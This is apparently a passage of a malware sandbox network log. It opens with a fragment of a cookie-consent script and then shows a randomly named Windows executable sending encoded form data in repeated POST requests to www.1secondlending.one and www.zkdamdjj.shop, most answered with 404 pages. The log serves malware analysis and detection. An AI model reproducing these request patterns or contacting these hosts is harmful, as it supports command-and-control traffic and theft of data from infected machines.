                                                                                                              Jan 11, 2025 03:27:12.607297897 CET1236INData Raw: 74 6f 72 2e 6c 61 6e 67 75 61 67 65 73 3a 5b 5d 3b 69 66 28 66 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d 22 29 21 3d 2d 31 29 7b 63 2e 70 75 73 68 28 66 2e 73 75 62 73 74 72 28 66 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d
                                                                                                              Data Ascii: tor.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.push(e.substr(e.indexOf("cmplang=")+8,2).toUpperCase())}else{if("cmp_setlang" in window&&window.cmp_s
                                                                                                              Jan 11, 2025 03:27:12.607331991 CET1236INData Raw: 69 29 2b 73 2c 39 39 39 39 29 7d 65 6c 73 65 7b 69 66 28 64 2e 73 65 61 72 63 68 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d 2d 31 29 7b 77 3d 64 2e 73 65 61 72 63 68 2e 73 75 62 73 74 72 28 64 2e 73 65 61 72 63 68 2e 69 6e 64 65 78 4f 66 28 69 29 2b
                                                                                                              Data Ascii: i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.indexOf("&"))}return w}var k=("cmp_proto" in h)?h.cmp_proto:"https:";if(k!="http:"&&k!="https:"){k="
                                                                                                              Jan 11, 2025 03:27:12.607388020 CET1236INData Raw: 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b 76 61 72 20 74 3d 76 28 22 62 6f 64 79 22 29 3b 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 64 69 76 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 73
                                                                                                              Data Ascii: endChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}if(t.length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}var m="js";var p=x("cmpdebugunmin
                                                                                                              Jan 11, 2025 03:27:12.607404947 CET438INData Raw: 61 6c 6c 79 20 68 69 64 64 65 6e 2c 20 70 6c 65 61 73 65 20 69 67 6e 6f 72 65 22 29 3b 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 72 6f 6c 65 22 2c 22 6e 6f 6e 65 22 29 3b 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65
                                                                                                              Data Ascii: ally hidden, please ignore");a.setAttribute("role","none");a.setAttribute("tabindex","-1");document.body.appendChild(a)}else{window.setTimeout(window.cmp_addFrame,10,b)}}};window.cmp_rc=function(h){var b=document.cookie;var f="";var d=0;while(
                                                                                                              Jan 11, 2025 03:27:12.652298927 CET1236INData Raw: 72 28 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 2b 31 2c 62 2e 6c 65 6e 67 74 68 29 7d 69 66 28 68 3d 3d 67 29 7b 66 3d 63 7d 76 61 72 20 65 3d 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 2b 31 3b 69 66 28 65 3d 3d 30 29 7b 65 3d 62 2e 6c 65 6e 67
                                                                                                              Data Ascii: r(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.substring(e,b.length)}return(f)};window.cmp_stub=function(){var a=arguments;__cmp.a=__cmp.a||[];if(!a.length){return __cmp.a}else{if(a[0]==="ping"){if(a[1
                                                                                                              Jan 11, 2025 03:27:12.652316093 CET1236INData Raw: 3b 5f 5f 67 70 70 2e 65 2e 70 75 73 68 28 7b 69 64 3a 63 2c 63 61 6c 6c 62 61 63 6b 3a 66 7d 29 3b 72 65 74 75 72 6e 7b 65 76 65 6e 74 4e 61 6d 65 3a 22 6c 69 73 74 65 6e 65 72 52 65 67 69 73 74 65 72 65 64 22 2c 6c 69 73 74 65 6e 65 72 49 64 3a
                                                                                                              Data Ascii: ;__gpp.e.push({id:c,callback:f});return{eventName:"listenerRegistered",listenerId:c,data:true,pingData:window.cmp_gpp_ping()}}else{if(g==="removeEventListener"){var h=false;__gpp.e=__gpp.e||[];for(var d=0;d<__gpp.e.length;d++){if(__gpp.e[d].id
                                                                                                              Jan 11, 2025 03:27:12.652332067 CET1236INData Raw: 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 63 21 3d 3d 6e 75 6c 6c 26 26 22 5f 5f 74 63 66 61 70 69 43 61 6c 6c 22 20 69 6e 20 63 29 7b 76 61 72 20 62 3d 63 2e 5f 5f 74 63 66 61 70 69 43 61 6c 6c 3b 77 69 6e 64 6f 77 2e 5f 5f 74 63 66 61 70 69 28
                                                                                                              Data Ascii: )==="object"&&c!==null&&"__tcfapiCall" in c){var b=c.__tcfapiCall;window.__tcfapi(b.command,b.version,function(h,g){var e={__tcfapiReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},b.parameter)}
                                                                                                              Jan 11, 2025 03:27:12.652347088 CET438INData Raw: 6d 70 5f 61 64 64 46 72 61 6d 65 28 22 5f 5f 75 73 70 61 70 69 4c 6f 63 61 74 6f 72 22 29 7d 69 66 28 21 28 22 63 6d 70 5f 64 69 73 61 62 6c 65 74 63 66 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62
                                                                                                              Data Ascii: mp_addFrame("__uspapiLocator")}if(!("cmp_disabletcf" in window)||!window.cmp_disabletcf){window.cmp_addFrame("__tcfapiLocator")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_addFrame("__gppLocator")}window.cmp_setStub("_


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              37192.168.2.105156443.205.198.29806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:27:17.985789061 CET765OUTPOST /j8pv/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 191
                                                                                                              Connection: close
                                                                                                              Host: www.1secondlending.one
                                                                                                              Origin: http://www.1secondlending.one
                                                                                                              Referer: http://www.1secondlending.one/j8pv/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 45 4b 47 44 2b 46 4e 56 6b 2b 47 4f 4f 52 33 54 75 71 4b 32 67 39 58 30 37 6d 46 50 44 44 71 64 6b 57 31 64 50 6d 38 4c 75 36 36 2f 43 74 37 43 6c 54 35 2b 31 6b 6a 30 72 77 4e 68 50 52 63 2b 51 47 47 4c 36 32 57 50 44 52 62 43 4a 57 48 4d 70 4a 45 7a 31 41 70 2f 59 74 4d 43 52 59 4a 62 4f 51 7a 6f 66 66 57 61 37 78 30 57 42 31 71 45 6c 32 68 6d 55 66 4d 77 50 57 47 2b 33 79 66 39 32 2b 72 47 61 53 70 46 4a 66 35 71 44 71 70 4a 7a 50 50 4b 7a 38 62 6f 4b 51 51 33 77 38 66 66 73 50 53 62 78 75 70 76 4a 48 46 31 5a 6d 44 46 64 5a 50 49 49 4b 37 74 41 68 59 50
                                                                                                              Data Ascii: 6n=EKGD+FNVk+GOOR3TuqK2g9X07mFPDDqdkW1dPm8Lu66/Ct7ClT5+1kj0rwNhPRc+QGGL62WPDRbCJWHMpJEz1Ap/YtMCRYJbOQzoffWa7x0WB1qEl2hmUfMwPWG+3yf92+rGaSpFJf5qDqpJzPPKz8boKQQ3w8ffsPSbxupvJHF1ZmDFdZPIIK7tAhYP
                                                                                                              Jan 11, 2025 03:27:18.812952042 CET691INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Sat, 11 Jan 2025 02:27:18 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 548
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              38192.168.2.105156543.205.198.29806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:27:20.534059048 CET789OUTPOST /j8pv/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 215
                                                                                                              Connection: close
                                                                                                              Host: www.1secondlending.one
                                                                                                              Origin: http://www.1secondlending.one
                                                                                                              Referer: http://www.1secondlending.one/j8pv/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 45 4b 47 44 2b 46 4e 56 6b 2b 47 4f 4d 78 48 54 6f 4e 57 32 6f 39 58 7a 2b 6d 46 50 59 7a 72 57 6b 57 35 64 50 69 73 62 76 49 65 2f 43 4a 33 43 6b 53 35 2b 35 45 6a 30 67 51 4e 6b 4c 52 63 31 51 48 37 2b 36 7a 57 50 44 52 2f 43 4a 55 66 4d 70 65 51 77 31 51 70 78 51 4e 4d 45 66 34 4a 62 4f 51 7a 6f 66 66 44 39 37 78 73 57 43 46 61 45 6d 55 4a 6c 58 66 4d 2f 4f 57 47 2b 6d 43 66 35 32 2b 71 72 61 51 64 72 4a 64 42 71 44 6f 78 4a 30 65 50 4a 36 38 61 6a 4f 51 52 70 33 2f 4f 7a 72 4e 65 6c 7a 75 67 6e 57 58 59 53 54 6e 2b 43 4d 49 75 66 62 39 6e 6a 4f 6e 74 6c 31 42 65 6f 6e 35 4d 32 43 45 62 5a 67 46 6a 33 54 38 4e 68 52 41 3d 3d
                                                                                                              Data Ascii: 6n=EKGD+FNVk+GOMxHToNW2o9Xz+mFPYzrWkW5dPisbvIe/CJ3CkS5+5Ej0gQNkLRc1QH7+6zWPDR/CJUfMpeQw1QpxQNMEf4JbOQzoffD97xsWCFaEmUJlXfM/OWG+mCf52+qraQdrJdBqDoxJ0ePJ68ajOQRp3/OzrNelzugnWXYSTn+CMIufb9njOntl1Beon5M2CEbZgFj3T8NhRA==
                                                                                                              Jan 11, 2025 03:27:21.365241051 CET691INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Sat, 11 Jan 2025 02:27:21 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 548
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              39192.168.2.105156643.205.198.29806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:27:23.080753088 CET1802OUTPOST /j8pv/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 1227
                                                                                                              Connection: close
                                                                                                              Host: www.1secondlending.one
                                                                                                              Origin: http://www.1secondlending.one
                                                                                                              Referer: http://www.1secondlending.one/j8pv/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 45 4b 47 44 2b 46 4e 56 6b 2b 47 4f 4d 78 48 54 6f 4e 57 32 6f 39 58 7a 2b 6d 46 50 59 7a 72 57 6b 57 35 64 50 69 73 62 76 49 57 2f 43 36 2f 43 6c 78 52 2b 34 45 6a 30 74 77 4e 6c 4c 52 63 53 51 47 54 36 36 7a 53 35 44 54 58 43 49 33 58 4d 38 62 73 77 6d 77 70 78 50 39 4d 46 52 59 4a 53 4f 55 66 30 66 66 54 39 37 78 73 57 43 48 43 45 77 32 68 6c 52 66 4d 77 50 57 47 49 33 79 66 56 32 2b 54 65 61 51 5a 56 4a 4d 68 71 43 49 68 4a 79 73 6e 4a 78 38 61 68 4a 51 52 68 33 2f 43 73 72 4e 53 44 7a 74 39 41 57 56 49 53 52 33 79 42 5a 37 43 49 50 73 4c 58 47 33 6c 2f 33 31 47 62 72 49 34 33 56 6b 69 43 37 68 4b 2f 47 34 4d 4e 47 55 64 56 73 63 78 6a 76 77 65 42 45 38 34 48 6d 37 4d 42 51 42 74 69 69 58 37 2b 38 57 36 35 33 52 74 76 6a 50 56 35 32 4f 4c 73 6b 63 45 6f 31 78 58 41 4e 36 47 49 43 30 58 67 41 36 4c 50 78 4f 65 68 7a 58 75 61 72 46 41 46 4f 72 34 4f 72 6e 4b 31 66 71 6b 42 6d 32 45 50 2b 68 45 62 50 56 4a 75 36 46 31 56 36 75 6e 4f 71 4c 42 56 33 65 45 35 30 42 35 52 35 44 6b 37 70 72 49 [TRUNCATED]
                                                                                                              Data Ascii: 6n=EKGD+FNVk+GOMxHToNW2o9Xz+mFPYzrWkW5dPisbvIW/C6/ClxR+4Ej0twNlLRcSQGT66zS5DTXCI3XM8bswmwpxP9MFRYJSOUf0ffT97xsWCHCEw2hlRfMwPWGI3yfV2+TeaQZVJMhqCIhJysnJx8ahJQRh3/CsrNSDzt9AWVISR3yBZ7CIPsLXG3l/31GbrI43VkiC7hK/G4MNGUdVscxjvweBE84Hm7MBQBtiiX7+8W653RtvjPV52OLskcEo1xXAN6GIC0XgA6LPxOehzXuarFAFOr4OrnK1fqkBm2EP+hEbPVJu6F1V6unOqLBV3eE50B5R5Dk7prIDejM0DxRGwOiLlNCYJpWEAOEDiv8hYAzOpeNk9unblGqJ9cvHReEoy5WbLeX1ZatjB3ZQ2OUIPly6PNm0tqcdRwh4Fr1SZeLvdcGR3TAzkm8KKlhnepvC4WC66njquvPOScQANscZeHUAQM1xaUbFuT0ZT7h9itTc9hDJScUGNRg79XwVbVElXcvYXZ9nBOQDzY8JMlh6cbdxHnOUNZNWciiPzM3N1X0v034WOLtf3mzLA0fcXY71SjnvFx6tsyapB/EN0CGApi2DB9LOHXV54G7T6LqkQNUaGU2XOvC5qAR4DAWh0ex/0EnxZrkqeFU2xBeQsfKGmTQLU3QmSlr8D5SzUJoztHap4ZHGiMOgV0RP/d9LBotfXbJQXdcRrtkPB8EISXCm3WYeq47KVoKX1r5f1wSvdGz3eyVkqJveIZsE9cJCUfqphpiIXimVGGOUN5ripfGWYSswY4yV4jvtIrjXjINQYe99ES5V9rzyVq/kac+Sa0PjPTYlD3DEVxHzADNvFRAN95dYraOqwEcX/b/eCNe5bPONFR/1SIk0gsQtzOZvh9xaYt06nKBP+T2Z2syYGo3/7cQPJlMxP+A+BBOK1UYmXMzq0pmE5HUS76iK1Z1jYuYY66a09ZWjE53aTIF2Z6icIqgGpljvIU4aR4cCGht7ndKnH [TRUNCATED]
                                                                                                              Jan 11, 2025 03:27:23.923000097 CET691INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Sat, 11 Jan 2025 02:27:23 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 548
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              40192.168.2.105156743.205.198.29806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:27:25.625957012 CET493OUTGET /j8pv/?P8dT=Gvw8Prk0H4&6n=JIuj9wxSnK6mEyWHgqme9cDOp2JPGD2avn5HAjA8ht24L6v+vQ9uqWv6ig59Dwg+VmGSo2u3Iy71OFL1070b7jcEPeQmL51Me3DwZ/KAlDYaGirikg== HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Connection: close
                                                                                                              Host: www.1secondlending.one
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Jan 11, 2025 03:27:26.532979012 CET691INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Sat, 11 Jan 2025 02:27:26 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 548
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              41192.168.2.1051568188.114.97.3806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:27:31.591665983 CET750OUTPOST /swhs/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 191
                                                                                                              Connection: close
                                                                                                              Host: www.zkdamdjj.shop
                                                                                                              Origin: http://www.zkdamdjj.shop
                                                                                                              Referer: http://www.zkdamdjj.shop/swhs/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 78 7a 33 56 47 6e 4e 36 59 4a 49 2b 37 78 49 2b 45 65 4b 55 64 49 43 74 4e 67 31 32 6d 61 62 6e 6a 41 66 6d 32 2f 75 75 2f 56 77 59 6b 43 44 53 70 68 37 52 2b 74 4a 51 48 36 72 6d 7a 49 6a 51 78 52 47 67 4b 6c 34 37 42 63 4c 4d 68 6e 55 4b 44 57 66 62 51 56 6f 6a 52 67 44 7a 59 50 6d 4c 62 30 6c 54 63 50 69 41 65 31 37 75 6d 59 6d 52 62 67 4f 6a 69 61 70 35 77 61 4c 4b 72 35 6b 50 68 4d 4d 35 70 69 39 7a 67 36 6c 6c 5a 34 77 36 67 34 44 2b 4e 55 56 70 77 68 67 50 49 53 59 35 38 73 43 62 6b 73 70 5a 32 72 55 45 54 69 6b 5a 39 2f 30 5a 37 4b 33 43 7a 70 78 66
                                                                                                              Data Ascii: 6n=xz3VGnN6YJI+7xI+EeKUdICtNg12mabnjAfm2/uu/VwYkCDSph7R+tJQH6rmzIjQxRGgKl47BcLMhnUKDWfbQVojRgDzYPmLb0lTcPiAe17umYmRbgOjiap5waLKr5kPhMM5pi9zg6llZ4w6g4D+NUVpwhgPISY58sCbkspZ2rUETikZ9/0Z7K3Czpxf


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              42192.168.2.1051569188.114.97.3806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:27:34.177995920 CET774OUTPOST /swhs/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 215
                                                                                                              Connection: close
                                                                                                              Host: www.zkdamdjj.shop
                                                                                                              Origin: http://www.zkdamdjj.shop
                                                                                                              Referer: http://www.zkdamdjj.shop/swhs/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
